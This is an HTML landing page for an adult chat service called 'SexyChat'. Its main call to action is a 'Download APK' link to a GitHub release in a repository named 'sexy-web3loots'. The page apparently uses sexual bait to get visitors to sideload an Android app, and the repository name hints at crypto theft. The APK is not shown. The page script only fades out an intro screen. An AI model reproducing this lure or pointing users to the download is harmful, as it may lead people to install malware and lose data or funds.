<!doctype html>
<html lang="en">
<head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1">
<title>SexyChat — Premium</title><link rel="stylesheet" href="styles.css"></head>
<body>
<div id="intro"><div class="intro-text">Just a second babe ❤️</div></div>
<header class="hero"><div class="bg"></div><div class="overlay"></div>
  <div class="container">
    <img src="logo.png" class="logo" alt="SexyChat">
    <h1 class="title">SexyChat</h1>
    <p class="subtitle">Unlimited Private Chats • HD Calls • Secure</p>
    <div class="cta-row">
      <a class="btn neon" href="https://github.com/abbasparmar18-wq/sexy-web3loots/releases/download/v1.0/signed.2.apk" target="_blank" download>Download APK</a>
      <a class="btn ghost" href="tutorial.html">Tutorial</a>
    </div>
  </div>
</header>
<section class="features">
  <div class="card">🔥 Live Private Sessions</div>
  <div class="card">💎 Premium Models</div>
  <div class="card">📸 Real-Time Video</div>
  <div class="card">🔐 Full Privacy</div>
</section>
<footer class="footer"><p>© 2025 SexyChat. All rights reserved.</p></footer>
<script>
document.addEventListener('DOMContentLoaded',function(){
  setTimeout(function(){
    var intro=document.getElementById('intro'); if(intro){ intro.style.opacity='0'; }
    document.body.classList.add('show-page'); setTimeout(function(){ if(intro) intro.style.display='none'; },500);
  },1000);
});
</script>
</body></html>